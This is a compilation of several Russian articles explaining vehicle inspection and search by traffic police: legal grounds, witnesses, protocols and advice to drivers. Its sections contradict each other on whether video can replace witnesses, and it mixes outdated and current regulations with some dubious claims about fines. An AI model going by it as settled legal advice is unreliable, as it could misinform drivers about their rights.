Осмотр тс и досмотр

Процедура проведения досмотра авто сотрудником ДПС

Остановка ТС инспектором ДПС – это уже неприятная ситуация, способная вывести водителя из равновесия. А проведение досмотра и вовсе веская причина для стресса! Как вести себя? Какими законами оперировать? Как проводится процедура? До какой границы простираются полномочия сотрудников ГИБДД? Эти и многие другие вопросы будут затронуты в статье, прочитав которую любой водитель сможет защитить свои права, действуя в рамках закона.

Процедура проведения досмотра авто сотрудником ДПС

Все действия сотрудников ГИБДД, производимые ими в отношении водителей и транспортных средств, регламентируются законодательно. К основным нормативным актам, на которые обе стороны – водитель и инспектор – могут ссылаться в случае возникновения спора, относятся:

  • Административный регламент, утверждённый Приказом МВД РФ № 664 от 23.08.2017 года
  • КоАП РФ

Досмотр также проводится с соблюдением статей перечисленных законов. Но не исключено, что обе стороны процедуры могут трактовать их по-своему, совершая ошибки и нарушения.

Досмотр ТС инспектора проводят редко, в большинстве случаев ограничиваясь проверкой документов. Но к иному повороту событий водители должны быть готовы, а значит хорошо знать, каким образом проводится досмотр и как защитить свои права, если должностное лицо откровенно превышает свои полномочия. Ведь отказ от досмотра или препятствие ему может повлечь за собой серьезные последствия – арест до 15 суток (часть 1 статьи 19.9 КоАП).

Основные отличия досмотра от осмотра автомобиля

Осмотр или досмотр? Для большинства автомобилистов различия в этих понятия незначительны или вовсе незаметны. Но с точки зрения закона (Административный регламент, утверждённый Приказом МВД РФ № 664 от 23.08.2017) разница между ними существенна. Проследить ее проще в таблице.

Кроме указанных выше формулировок действий уполномоченных лиц при остановке авто, существует и еще одна – «обыск». Закон «О полиции» гласит, что в рамках этих манипуляций инспектор может самостоятельно трогать и передвигать вещи в салоне ТС и нарушать его целостность. Но обыску предшествуют:

  • Возбуждение дела
  • Выдача соответствующего постановления

Основания для досмотра

Этот момент во всей процедуре вызывает больше всего вопросов. Главное, что должен запомнить водитель – слова инспектора, не подкрепленные документами, не будут основаниями для досмотра. Такое поведение является прямым нарушением ст. 27.9 КоАП РФ и Приказа 664.

По своему усмотрению проводить досмотр сотрудник ГИБДД не в праве. Законными причинами проверки авто будут:

  • Наличие ориентировки на данное ТС
  • Задержание лиц, находящихся в авто (часть 2 статьи 14 Закона 3-ФЗ от 07.02.2011 «О полиции»)
  • Проверка полученной информации об участии автомобиля в преступлении или правонарушениях разного характера (сведения могут быть отправлены с постов ДПС, участниками дорожного движения и не только)
  • Подтверждение или опровержение данных о наличии в транспортном средстве предметов, с помощью которых возможно совершить правонарушение
  • Проверка информации о перевозке оружия, ядов и других опасных веществ

Ранее отказ от осмотра машины становился поводом к проведению тщательного досмотра без согласия автовладельца. Но в 2019 году в новом прочтении регламента такого пункта в перечне оснований не существует.

Если уполномоченное лицо намеренно задерживает владельца ТС, не проводя процедуру досмотра, несмотря на оповещение о ее начале, водитель может немедленно пожаловаться на неправомерные действия звонком в дежурную часть или любое отделение полиции.

Порядок проведения процедуры

Согласно Административному регламенту, утверждённому Приказом МВД РФ № 664 от 23.08.2017 и КоАП РФ, в правовом поле процедура досмотра будет выглядеть следующим образом:

  • Остановка авто
  • Предъявление документальных оснований для остановки и проведения досмотра
  • Поиск 2 понятых
  • Освобождение салона ТС водителем и пассажирами
  • Тщательный досмотр автомобиля инспектором, включая багажник и груз
  • Составление протокола о проведенной процедуре
  • Оставление подписи обеими сторонами
  • Передача водителю копии протокола

Кажется, что все крайне просто и вопросов, а тем более споров относительно процедуры досмотра возникать не должно. Но на практике ошибки во время досмотра совершают как владельцы автомобилей, так и инспекторы. Поэтому некоторые пункты приведенного выше списка будут рассмотрены более подробно.

Остановка ТС

Дежурный сотрудник ГИБДД имеет полное право останавливать автомобиль около поста и в любом другом месте – в городе и за его пределами. При этом махнуть он может не только жезлом, но и рукой. В том и другом случаях водитель должен остановиться.

Когда остановка совершена, водитель может спокойно дожидаться сотрудника ДПС, который обязан:

  • Представиться в устной форме
  • Сообщить причину задержки

Владелец ТС может попросить удостоверение инспектора, которое предоставляется им по первому требованию. Наибольший интерес в документе вызывают:

  • Номер
  • Ф.И.О. должностного лица, произведшего остановку

Перечисленные данные можно переписать в блокнот. Фотографировать их запрещено.

Поиск понятых и освобождение салона транспортного средства

Понятыми не могут быть:

  • Пассажиры остановленного авто
  • Сотрудники ГИБДД

Инспектор должен назначить понятых из случайных прохожих или остановить с этой целью еще один автомобиль. Незаинтересованные лица обязательно предоставляют сотруднику ДПС удостоверения личности, данные из которых будут вписаны в протокол.

Досмотр ТС осуществляется только при условии пустого салона. Водитель и пассажиры обязаны выйти из машины, но присутствовать во время процедуры и содействовать ее проведению в рамках правового поля. При этом допустимо вести видео- и фотосъемку процесса.

Непосредственный досмотр

Здесь инспекторы часто превышают свои полномочия. Поэтому любой водитель должен знать, что:

  • Трогать руками личные вещи, открывать багажник, капот и «бардачок» должностное лицо не может – по его просьбе все подобные действия совершает владелец ТС
  • Опломбированный груз не подлежит вскрытию – о нем по рации сообщают в дежурную часть и только после поступления соответствующих распоряжений (это делается в самом крайнем случае, когда существует прямая угроза жизни) целостность пломбы нарушается
  • Сотрудники наряда не препятствуют нахождению водителя около своего автомобиля, но в случае подозрений на совершение им уголовного преступления имеют право частично ограничить его свободу (наручниками)
  • При обнаружении в процессе досмотра административного правонарушения или иного преступления (совершенного либо запланированного) инспектор составляет соответствующий документ.

В первом случае это будет дело о правонарушении, открытое самим сотрудником ДПС. Во втором – рапорт, передающийся следственной группе, направленной на место досмотра посредством звонка в дежурную часть.

Составление протокола

По результатам досмотра уполномоченное лицо составляет протокол. В нем указываются:

  • Данные инспектора: Ф.И.О., звание, должность
  • Место и дата
  • Данные лица, управлявшего ТС: Ф.И.О., дата рождения, номер и дата выдачи водительского удостоверения, место регистрации, адрес проживания, телефон
  • Идентификационных признаки транспортного средства
  • Данные понятых: Ф.И.О., дата рождения, место регистрации, адрес проживания, телефон

В протоколе подробно излагается процедура проведения досмотра и обнаруженные в ее ходе вещественные доказательства (они должны быть сфотографированы и в распечатанном виде приложены к документу) вины владельца ТС во вменяемых ему преступных действиях.

Для ознакомления протокол обязательно передается заинтересованному лицу. При несогласии с какой-либо изложенной информации оно имеет право отказаться подписывать документ.

Процедура может сопровождаться изъятием у владельца каких-либо предметов. Данный факт с перечислением вещей в обязательном порядке приводится в протоколе. Если это не сделано, водитель должен указать инспекторам на упущение. Понятые также должны присутствовать в процессе общения инспектора и лица, управлявшего ТС.

Понятые или видеозапись

Случается, что инспектор отказывается искать понятых, ссылаясь на ведение официальной видеосъемки. Такие действия не могут классифицироваться как правомерные. Закон не обязывает сотрудников ДПС вести съемку досмотра. Производить ее допустимо по собственной инициативе обеими сторонами. А вот наличие понятых является обязательным условием законности проведенного досмотра. Поэтому на их присутствии водитель должен настаивать.

Нарушения, которые могут допускать сотрудники ДПС при проведении досмотра

Некоторые инспекторы намеренно или без умысла допускают ряд нарушений во время проведения процедуры. Часто они остаются без фиксирования водителем, так как он сам не в полной мере понимает, как именно должен происходить досмотр.

Наиболее распространены следующие ошибки:

  • Отсутствие понятых
  • Отстранение владельца ТС от участия в процессе
  • Самостоятельное перекладывание вещей, что классифицируется уже как обыск
  • Отказ в просьбе ознакомиться с протоколом
  • Требование подписать протокол без предварительного ознакомления
  • Приказ выложить вещи из багажника

Вторая сторона досмотра в праве указать инспектору на нарушения в вежливой форме и записать это на видео.

Ответственность инспектора

Если сотрудник ДПС не проводит должные действия, а совершает ошибку за ошибкой, то спорить с ним не имеет смысла. Все нарушения можно зафиксировать и в течение 10 дней внести в жалобу.

При ее рассмотрении должностные лица будут руководствоваться статьей 19.1 КоАП РФ. Если жалоба найдет свое подтверждение, то инспектора накажут штрафом в размере 20 000 рублей.

Рекомендации водителю

В любой ситуации участнику дорожного движения рекомендовано:

  • Выполнять распоряжения сотрудников ГИБДД
  • Сохранять спокойствие
  • Быть вежливым
  • Принимать активное участие во всех манипуляциях, производимых с авто
  • Фиксировать происходящее на видео
  • Взять контактные данные свидетелей и понятых

На дороге часто возникают неприятные ситуации. Но тот водитель, который знает свои права и не нарушает закон, сможет решить любую проблему в рамках правового поля.

Осмотр и досмотр в обновленном административном регламенте ГИБДД

Добрый день, уважаемый читатель.

Сегодня речь пойдет о двух важных процедурах — осмотре и досмотре автомобиля. Напомню, что сами эти процедуры были подробно рассмотрены в одном из уроков моего бесплатного аудиокурса «Секреты общения с ГИБДД» (рекомендую его прослушать), а сегодня мы поговорим лишь о нововведениях.

Основания для осмотра транспортного средства

Рассмотрим обновленный перечень оснований (причин) для осмотра транспортного средства:

149. Основаниями для осмотра транспортного средства и груза, то есть визуального обследования транспортного средства и перевозимого груза, являются:

  • ориентировки, указания в соответствии с целями проведения специальных мероприятий 1 ;
    1 Пункт 23 части 1 статьи 11 Закона Российской Федерации «О милиции».
  • необходимость проведения сверки маркировочных обозначений транспортного средства с записями в регистрационных документах (пункт 83 настоящего Административного регламента) 1 ;
    1 Пункт 23 части 1 статьи 11 Закона Российской Федерации «О милиции».
  • наличие признаков несоответствия перевозимого груза данным, указанным в документах на перевозимый груз 1 ;
    1 Пункт 23 части 1 статьи 11 Закона Российской Федерации «О милиции».
  • наличие оснований полагать, что транспортное средство эксплуатируется при наличии неисправностей или условий, при которых его эксплуатация запрещена 1 .
    1 Пункт 1 части 1 статьи 28.1 Кодекса.

149. Основаниями для осмотра транспортного средства и груза, то есть визуального обследования транспортного средства и перевозимого груза, являются:

  • ориентировки, иная информация об их использовании в противоправных целях 1 ;
    1 Пункт 20 части 1 статьи 13 Федерального закона «О полиции».
  • необходимость проведения сверки маркировочных обозначений транспортного средства с записями в регистрационных документах (пункт 83 настоящего Административного регламента) 1 ;
    1 Пункт 20 части 1 статьи 13 Федерального закона «О полиции».
  • наличие признаков несоответствия перевозимого груза данным, указанным в документах на перевозимый груз 1 ;
    1 Пункт 20 части 1 статьи 13 Федерального закона «О полиции».

Обратите внимание, что из перечня оснований для осмотра (визуального) автомобиля исключен последний пункт. Теперь сотрудники ГИБДД не могут осматривать автомобиль даже в том случае, если у них есть основания полагать, что автомобиль неисправен.

В данном случае возможности сотрудников ГИБДД несколько урезаны.

Документы об осмотре транспортного средства

Напомню, что до 4 ноября 2012 года о проведении осмотра автомобиля никакие документы не составлялись:

153. Процессуальные документы о проведении осмотра транспортного средства и груза не составляются.

Т.е. сотрудник ГИБДД мог по собственному желанию обойти автомобиль, заглянуть ему под днище, в салон и т.д. Поскольку документально факт осмотра не подтверждался, я рекомендовал водителям не способствовать осмотру автомобиля, т.е. не открывать салон, багажник, капот и т.д. Таким образом, процедура досмотра была более предпочтительной.

Теперь же ситуация несколько изменилась:

153 1 . О проведении осмотра транспортного средства и груза по основаниям, предусмотренным Федеральным законом «О полиции», сотрудник составляет акт осмотра транспортного средства и груза.

В акте осмотра транспортного средства и груза указываются дата и место его составления, должность, специальное звание, фамилия и инициалы сотрудника, составившего акт, сведения о лицах, присутствующих при осмотре, с указанием их фамилии, имени, отчества, адреса места жительства, телефона, о типе, марке, модели, государственном регистрационном знаке, иных идентификационных признаках транспортного средства, о виде, количестве, иных идентификационных признаках перевозимого груза. В акте осмотра транспортного средства и груза делается запись о применении фото- и киносъемки, видеозаписи, иных установленных способов фиксации вещественных доказательств. Материалы, полученные при осуществлении осмотра с применением фото- и киносъемки, видеозаписи, иных установленных способов фиксации вещественных доказательств, прилагаются к акту.

В настоящее время по факту осмотра должен составляться специальный акт, в который в том числе вносится и информация о свидетелях, присутствующих при осмотре.

Так что осмотр теперь не так страшен. Еще раз хочу обратить внимание, что если Ваш автомобиль осматривают, требуйте присутствия свидетелей. Это может сыграть Вам на руку.

Ну а вообще рекомендую прослушать аудиокурс «Секреты общения с ГИБДД», там процедуры осмотра и досмотра разобраны достаточно детально, повторяться здесь не буду.

Основания для досмотра транспортного средства

Что касается оснований для досмотра транспортного средства, то они подверглись еще большему количеству изменений:

155. Основаниями для досмотра транспортного средства, то есть обследования транспортного средства, проводимого без нарушения его конструктивной целостности, являются:

  • ориентировки, указания в соответствии с целями проведения специальных мероприятий 1 ;
    1 Пункты 20, 23 части 1 статьи 11 Закона Российской Федерации «О милиции».
  • отказ водителя или граждан, сопровождающих грузы, от проведения осмотра транспортного средства и перевозимого груза 1 ;
    1 Пункты 20, 23 части 1 статьи 11 Закона Российской Федерации «О милиции».
  • проверка обоснованного предположения о наличии в транспортном средстве оружия, боеприпасов, взрывчатых веществ, взрывных устройств, наркотических средств или психотропных веществ, других вещей, предметов и веществ, изъятых из гражданского оборота и находящихся у граждан без специального разрешения, орудий совершения либо предметов преступления 1 ;
    1 Пункты 20, 23 части 1 статьи 11 Закона Российской Федерации «О милиции».
  • проверка обоснованного предположения о наличии в транспортном средстве орудий совершения либо предметов административного правонарушения 1 .
    1 Часть 1 статьи 27.9 Кодекса.

155. Основаниями для досмотра транспортного средства, то есть обследования транспортного средства, проводимого без нарушения его конструктивной целостности, являются:

  • проверка обоснованного предположения о наличии в транспортном средстве оружия, боеприпасов, патронов к оружию, взрывчатых веществ, взрывных устройств, наркотических средств, психотропных веществ или их прекурсоров либо ядовитых или радиоактивных веществ 1 ;
    1 Пункт 16 части 1 статьи 13 Федерального закона «О полиции».
  • проверка обоснованного предположения о наличии орудий совершения либо предметов административного правонарушения в транспортном средстве или следов административного правонарушения на транспортном средстве 1 .
    1 Часть 1 статьи 27.9 Кодекса.
  • осуществление задержания, административного задержания лица, находившегося в транспортном средстве 1 .
    1 Часть 6 статьи 14 Федерального закона «О полиции».

Итак обо всем по порядку.

1. Из перечня исключен пункт 1. Теперь автомобили не могут досматриваться в ходе проведения спецопераций. Т.е. даже при наличии у сотрудника ГИБДД ориентировки на автомобиль, похожий на Ваш, он не сможет провести досмотр.

2. Из перечня исключен пункт 2. Теперь отказ от осмотра автомобиля или груза не может служить причиной для досмотра транспортного средства.

3. Добавлен новый пункт перечня, который позволяет проводить досмотр в случае задержания или административного задержания лица, находящегося в автомобиле (водителя или пассажира).

Как посмотреть

Тем более, что, как показывает практика, разницу между этими двумя процессуальными действия не всегда знают не только автомобилисты, но и инспекторы дорожно-патрульной службы ГИБДД.

А поводом к таким разъяснениям послужили действия сотрудников ДПС на стационарном посту «Кущевский» в Краснодарском крае. Который также известен под названием «Цукерова балка».

В одном из своих многочисленных репортажей о поездке на юга написал известный защитник прав автомобилистов Петр Шкуматов. По его словам, его машину на этом посту буквально обыскали без понятых и прочих необходимых официальных формальностей.

Примечательно, что многие автовладельцы, которые регулярно курсируют через этот пост и подвергаются точно таким же процедурам, удивились возмущению Шкуматова. Подумаешь — обыскали. Зато это заслон наркоторговцам и прочим криминальным личностям. Однако все имеет свои рамки. И все действия инспекторов ДПС должны соответствовать законодательству. А любое нарушение должно пресекаться.

Итак, подчеркивает ГИБДД, в соответствии с Законом «О полиции» осмотр заключается в визуальном обследовании транспортного средства и перевозимого груза. Он проводится без участия понятых и, чаще всего, без применения технических средств (хотя их применение не исключается). Водителю при этом предлагается добровольно предоставить сотруднику полиции возможность визуально осмотреть транспортное средство и предполагаемые места перевозки груза, конструктивно для этого предназначенные. Результаты осмотра отражаются в акте в произвольной форме.

В случае отказа водителя добровольно предоставить возможность визуального осмотра при наличии оснований сотрудник полиции вправе произвести досмотр. Как во время осмотра, так и досмотра своей автомашины, владелец вправе вести видеосъемку действий полиции. Также и сотрудники полиции имеют право осуществлять видеосъемку проводимых мероприятий. Под досмотром понимается обследование транспортного средства, проводимое без нарушения его конструктивной целостности (статья 27.9 КоАП РФ). В отличие от осмотра, досмотр осуществляется либо в присутствии двух понятых, либо с применением видеозаписи.

Результаты фиксируются или в протоколе о досмотре транспортного средства, или в протоколе об административном задержании, в котором производится соответствующая запись. При этом копия протокола о досмотре транспортного средства вручается владельцу машины.

При осмотре владелец сам открывает капот, багажник, бардачок и двери. Инспектор может только попросить подвинуть вещи или открыть, например, сумку.

В случае досмотра он все это может проделать сам, но с участием понятых или видеосъемки, поясняя все свои действия.

Лев Воропаев, адвокат:

— В ситуации, когда сотрудники полиции пытаются осуществить осмотр транспортного средства водителей, я бы в целях исключения неприятных ситуаций для граждан и в связи с тем, что проведение процедуры осмотра должным образом в действующем законодательстве не прописана, рекомендовал отказываться от такового и настаивать на проведении досмотра.

При осуществлении досмотра стоит рекомендовать водителям снимать на мобильные устройства всю процедуру. Требовать от инспектора, который хочет применить данную меру обеспечения, начать составлять протокол досмотра или, если применяется задержание, вносить записи в протокол задержания. После чего настаивать на том, чтобы инспектор начал осуществлять указанную процедуру или в присутствии двух понятых или осуществляя видеосъемку всей процедуры.

Лишь после соблюдения указанных условий стоит предоставить возможность инспектору начать досмотр вашего автомобиля. При осуществлении досмотра надо принимать в нем самое активное участие, в том числе путем видеофиксации каждого действия инспектора при проведении досмотра. Рекомендую лично открывать багажник, бардачок и т.д. и собственноручно демонстрировать вещи, интерес к досмотру которых проявит инспектор ДПС.

Правила досмотра и осмотра автотранспорта сотрудниками ГИБДД: основания, правила, документальное оформление

Практически каждый водитель сталкивался с ситуацией, когда машину остановил инспектор и что-то подозревая, говорил: «Глушите мотор, открывайте багажник!» Многие думают, что это приказ к действию, хотя на самом деле – это всего лишь просьба. Даже если водителю нечего скрывать и бояться, он не обязан выполнять данное распоряжение. Разумным будет вопрос: «Для чего глушить мотор и открывать багажник? Для процедуры досмотра или осмотра?» После нужно дождаться ответа инспектора ГИБДД. Если он хочет провести осмотр, то водитель не обязан глушить двигатель, открывать багажник или выходить из салона. Пусть сотрудник ходит вокруг машины и осматривает её. Если это досмотр автомобиля, то нужно требовать соблюдения регламента: объяснения причин, наличие двух понятых, ведение протокола.

Досмотр и осмотр — в чём разница?

Многообразие приставок, которые используются в русском языке, иной раз существенно меняет смысл слова. Таким ярким примером могут стать определения «досмотр» и «осмотр» автотранспортных средств.

Осмотр представляет собой визуальную проверку сотрудником Госавтоинспекции автомобиля, водителя, пассажиров и грузов. При этом сотрудник не имеет права касаться каких-либо частей авто, открывать двери и осматривать содержимое салона и багажника. Водитель не обязан выключать двигатель, выходить из машины, открывать багажник.

Досмотр – это серьёзная процедура фактической проверки транспорта, которая подразумевает под собой:

  1. Наличие оснований.
  2. Визуальную проверку личных вещей водителя, пассажиров и грузов, без права прикасаться к ним руками. В противном случае это действие квалифицируется как обыск.
  3. Выход из салона авто всех участников поездки.
  4. Соблюдение регламента проверки.

Основания для проведения досмотра автомобиля

Правомочными основаниями для проведения досмотра ТС можно считать:

  • факт существования полицейской ориентировки на данную марку, модель и цвет автомобиля. Цель – проверка полученных сведений об участии данного ТС в правонарушениях (данные могут быть получены с постов ДПС, от других участников дорожного движения, полиции);
  • подозрение, что в транспорте находятся предметы, запрещенные к транспортировке, а также предметы, требующие специального разрешения на владение и (или) посредством которых можно совершить преступление (оружие, наркотики, яды и другие опасные вещества и предметы);
  • подозрение, что в транспорте находятся лица, подлежащие задержанию по розыскному делу;
  • подозрение, что провозимый груз не соответствует сопроводительным документам;
  • необходимость проведения маркировки ТС и сверки с записями в регистрационных документах.

Правила проведения досмотра

Досмотр автомобиля – это строго регламентированное мероприятие, которое включает в себя:

  • законодательное регулирование;
  • правила остановки автотранспорта на дорогах общего пользования;
  • оглашение и предъявление законных оснований для проведения досмотра;
  • поиск двух понятых лиц;
  • освобождение салона авто;
  • проведение фактической детальной проверки автомобиля и грузов под наблюдением понятых или с использованием фотовидеофиксирующей аппаратуры с обеих сторон;
  • составление, подписание протокола о проведённой проверке;
  • передача копии документа водителю.

Законодательное регулирование

Досмотр транспортного средства сотрудниками ГИБДД регламентируется Кодексом об Административных правонарушениях и Приказом МВД.

КоАП:

  • ст. 27.2 – 27.3 определяют круг лиц, допущенных к досмотру ТС;
  • ст. 27.7 оглашает порядок участия в процедуре понятых лиц и ведения видеофиксации;
  • ст. 27.9 даёт определение термину «досмотр».

Остановка ТС

Инспектор Госавтоинспекции, как должностное лицо, может остановить движущийся автомобиль около поста, а также в любом месте (в черте города или вне населённого пункта), за исключением тех мест, где этот манёвр запрещен разметкой или дорожными знаками.

Понятые и видеозапись

Действующее законодательство определяет порядок участия понятых лиц и применения аппаратуры видеосъёмки, а именно, указывает на взаимозаменяемость этих двух составляющих. В КоАП РФ чёрным по белому написано, что досмотр ТС может производиться либо в присутствии двух понятых, либо с применением видеозаписывающих устройств.

Источник: http://www.consultant.ru/document/cons_doc_LAW_34661/5477fe23baa9a8a3515e16e95b7b383d9152fcd4/

Если досмотр планируется вести с участием двух свидетелей, то инспектор должен найти их непосредственно после того, как он остановил машину и огласил своё намерение произвести досмотр. Свидетели не могут быть выбраны из коллег инспектора и пассажиров досматриваемого автотранспорта.

Пустой салон

Правила досмотра автомобиля сотрудниками ДПС подразумевают, что процесс детальной проверки автотранспорта гражданских лиц начинается только после освобождения салона. В машине не должно быть водителя и (или) его спутников. Они могут находиться рядом с автомашиной. Если граждане подозреваются в каких-либо серьёзных нарушениях закона, сотрудники дорожной полиции вправе применить дополнительные меры осторожности (вплоть до наручников).

Протокол досмотра

Заключительным этапом проверки, которая является официальным досмотром ТС, становится составление протокола. Он составляется и в случае обнаружения какого-либо правонарушений, и в случае, если проверка показала, что автомобиль и его содержимое «юридически чистое». Если обнаружены уголовные правонарушения, то в дополнение к протоку составляется рапорт для следственной группы, которая должна прибыть на место досмотра. Её вызывают звонком в дежурную часть. Если обнаружены только административные «грехи», то сотрудник Госавтоинспекции выписывает протокол об административном правонарушении.

Оформление документа включает в себя информацию о месте и дате составления протокола, о проверяющем (должность, ФИО), о владельце транспорта, водителе, пассажирах, идентификационные признаки ТС (гос. номер, марка, модель машины), а также о запрещённых вещах, которые обнаружены в результате проверки. К протоколу должны прилагаться видео-фотоматериалы, если они были использованы в мероприятии. В обязательном порядке документ должен содержать подписи всех сторон, включая инспектора, водителя и свидетелей. Если водитель не согласен с протоколом, он должен собственноручно написать фразу «С протоколом не согласен. Требуются услуги адвоката», и поставить подпись под фразой. Копия документа отдаётся водителю досматриваемого автотранспорта.

На что «закрывают глаза» инспекторы ГИБДД?

Сотрудники Госавтоинспекции, в отличие от гражданских лиц и автолюбителей, не путают понятия «досмотр» и «осмотр», но нередко пользуются юридической безграмотностью граждан. Очень часто инспекторы злоупотребляют своими полномочиями и допускают следующие «ошибки»:

  • запутывают граждан и проводят досмотры и обыски под предлогом простого осмотра;
  • не объясняют причины досмотра и не обосновывают свои действия;
  • не привлекают нужное количество свидетелей;
  • привлекают заранее подготовленных понятых лиц;
  • не привлекают свидетелей и не ведут видеосъемку;
  • отстраняют шофёра от процесса и сами перекладывают, обыскивают личные вещи и грузы, открывают сумки, багажники, бардачки;
  • приказывают вытащить все вещи из багажника;
  • не дают ознакомиться с протоколом, но требуют его подписать.

Советы водителю при досмотре автомобиля

Опытные автолюбители и юристы советуют:

  1. После остановки проясните, какой процедуре ваш автомобиль хотят подвергнуть «досмотру» или «осмотру».
  2. Корректно и вежливо попросите представить документы проверяющего, запищите его данные.
  3. Корректно и вежливо попросите представить документ-основание остановки и досмотра. При отказе сошлитесь на статью № 5 российского закона «О полиции». Вы имеете право ознакомиться с документом, на основании которого ограничивают вашу свободу и права.
  4. Спокойно выйдите из машины.
  5. Удостоверьтесь, что понятые лица были найдены после остановки вашей машины. Возьмите контактные данные свидетелей. Если ведётся видеосъёмка, тоже снимайте все на видео.
  6. Участвуйте в досмотре. Открывайте сумки и части машины своими руками. Следите, чтобы инспектор ничего не трогал.
  7. Помните, что вы имеете право на звуковую, видео- и фотофиксацию происходящего процесса.
  8. Прочитайте протокол побуквенно. Если вы не согласны с каким-либо пунктом, напишите фразу о своём несогласии и подпишите.
  9. Заберите копию протокола.
  10. Обжалуйте протокол, если считаете, что он не правомочный в течение 10 дней в вышестоящей инстанции или судебном органе.

Заключение

Нередко автолюбители путают осмотр автомобиля сотрудником ДПС и досмотр. Поэтому большое количество водителей, многие из которых обладают опытностью и многолетним водительским стажем, спрашивают: «Имеет ли право гаишник досматривать автомобиль?» Да, сотрудник дорожной полиции вправе произвести детальную проверку автомобиля, но имея на то веские причины и не трогая автомобиль и вещи своими руками. Знайте, что если инспектор лично передвигает вещи, открывает сумки – это обыск, который является злостным превышением должностных полномочий.

Водитель должен знать свои права, но при этом вести себя корректно, сдержано и вежливо. Нельзя вступать в споры, дебаты и выражать агрессию. Чаще всего досмотр производится в ходе спецопераций по задержке преступников, передвигающихся на похожих автомобилях. Такие данные приходят к инспекторам в виде ориентировок. Ведь обеспечение безопасности на дорогах – это главный служебный долг сотрудников ГИБДД.

Особенности юриспруденции. Остановка ТС. Досмотр и осмотр ТС.

Добрый день. Пока готовится пост про социальные льготы (включая налоговые), дополню автомобильную тему.

*Часть материала взята из правовой системы «Консультант Плюс»

КоАП РФ — Кодекс об административных правонарушениях Российской Федерации

ПДД — Правила дорожного движения (Постановление Правительства РФ от 23.10.1993 N 1090)

Средства видеофиксации — работающие в автоматическом режиме специальные технические средства, имеющие функции фото- и киносъемки, видеозаписи, или средства фото- и киносъемки, видеозаписи (ст.2.6.1 КоАП РФ)

ГИБДД — Государственная инспекция безопасности дорожного движения

Регламент — Приказ МВД России от 02.03.2009 N 185 об утверждении регламента по контролю за соблюдением ПДД

ТС — транспортное средство

Водитель обязан выполнить требование сотрудника ГИБДД об остановке. За невыполнение этого требования предусмотрена ответственность в виде штрафа в размере от 500 до 800 руб. (п.2.4 ПДД, ч.2 ст.12.25 КоАП РФ).

Полиция вправе (п.20 ч.1 ст.13 Закона о Полиции):

1) останавливать транспортные средства, если это необходимо для выполнения возложенных на полицию обязанностей по обеспечению безопасности дорожного движения;

2) проверять документы на право пользования и управления транспортным средством;

3) проверять документы на транспортные средства и перевозимые грузы;

4) проверять наличие полиса ОСАГО;

5) осматривать с участием водителей или граждан, сопровождающих грузы, транспортные средства и грузы при подозрении, что они используются в противоправных целях, с составлением соответствующего акта;

6) задерживать транспортные средства, находящиеся в розыске;

7) временно ограничивать или запрещать дорожное движение.

*Такие права предоставляются только — сотрудникам ГИБДД (ч.2 ст.13 Закона о Полиции; п.3-4 Регламента).

Основаниями для остановки транспортного средства сотрудником ГИБДД являются (п.63 Регламента):

1) установленные визуально или зафиксированные с использованием технических средств признаки нарушений требований в области обеспечения безопасности дорожного движения;

2) наличие данных (ориентировок, информации дежурного, других нарядов, участников дорожного движения, визуально зафиксированных обстоятельств), свидетельствующих о причастности водителя, пассажиров к совершению ДТП, преступления или административного правонарушения;

3) наличие данных (ориентировок, сведений оперативно-справочных и разыскных учетов, информации дежурного, других нарядов, участников дорожного движения) об использовании транспортного средства в противоправных целях или наличие оснований полагать, что оно находится в розыске;

4) необходимость опроса водителя или пассажиров об обстоятельствах совершения ДТП, административного правонарушения, преступления, очевидцами которого они являлись или являются;

5) необходимость привлечения участника дорожного движения в качестве понятого;

6) выполнение распорядительно-регулировочных действий;

7) необходимость использования транспортного средства;

8) необходимость привлечения водителя для оказания помощи другим участникам дорожного движения или сотрудникам полиции;

9) проведение на основании распорядительных актов руководителей органов внутренних дел, органов управления Госавтоинспекции специальных мероприятий, связанных с проверкой в соответствии с целями соответствующих специальных мероприятий транспортных средств, перемещающихся в них лиц и перевозимых грузов;

10) проверка документов на право пользования и управления транспортным средством, документов на транспортное средство и перевозимый груз, а также документов, удостоверяющих личность водителя и пассажиров (только на стационарных постах ДПС).

**Не допускается остановка сотрудником ГИБДД транспортных средств на участках дорог, где их остановка запрещена правилами дорожного движения, за исключением случаев, когда такая остановка связана с необходимостью пресечения преступления, административного правонарушения, осуществления распорядительно-регулировочных действий, предотвращения реальной угрозы причинения вреда жизни, здоровью и (или) имуществу участников дорожного движения, а также случаев обозначения места остановки патрульным автомобилем с включенными специальными световыми сигналами, другими средствами регулирования и организации дорожного движения (п. 66 Регламента).

Досмотр и осмотр ТС.

Осмотр транспортного средства.

Осмотр ТС и перевозимого груза — это их визуальное обследование (п.149 Регламента).

Основания для осмотра:

— ориентировки, иная информация об использовании ТС или груза в противоправных целях;

— необходимость сверки маркировочных обозначений ТС с записями в регистрационных документах;

— наличие признаков несоответствия перевозимого груза данным, указанным в документах на перевозимый груз.

*Отказ водителя от проведения осмотра ТС не является основанием для досмотра.

**Сотрудник полиции при осмотре обязан составить акт осмотра (п. 153.1 Регламента).

Досмотр транспортного средства

Досмотр автомобиля — это его обследование, проводимое без нарушения конструктивной целостности автомобиля для обнаружения орудий совершения либо предметов административного правонарушения (ч.1 ст.27.9 КоАП РФ).

Основанием для досмотра (п.155 Регламента):

— проверка обоснованного предположения о наличии орудий совершения либо предметов административного правонарушения в ТС или следов административного правонарушения на нем;

— проверка обоснованного предположения о наличии в транспортном средстве оружия, боеприпасов, патронов к оружию, взрывчатых веществ, взрывных устройств, наркотических средств, психотропных веществ или их прекурсоров либо ядовитых или радиоактивных веществ;

— задержание, административное задержание лица, находившегося в ТС.

*Досмотр проводится в присутствии двух понятых либо с применением видеозаписи (п.156, 159 Регламента; ч.2 ст.27.9 КоАП РФ).

**Досмотр должен быть проведен в присутствии владельца ТС. В случаях, не терпящих отлагательства, досмотр может быть проведен в его отсутствие (п.157 Регламента; ч.3 ст.27.9 КоАП РФ).

***Досмотр автомобиля без протокола и без понятых либо без применения видеозаписи для фиксации процессуальных действий незаконен (ст. 19.1 КоАП РФ).

При проведении осмотра происходит визуальный обзор ТС (в основном для сверки маркировочных обозначений) и груза с согласия водителя, а досмотр предполагает проверку содержимого автомобиля.

Кроме того, досмотр транспортного средства, в отличие от осмотра, является мерой обеспечения производства по делу об административном правонарушении, чем и обусловлены более веские для его проведения основания (ст.27.1 КоАП РФ).

В общем случае при остановке автомобиля сотрудником полиции вы имеете право не выходить из автомобиля, но если инспектор предложит вам покинуть автомобиль для проведения досмотра, нужно согласиться (п.160, 70 Регламента).

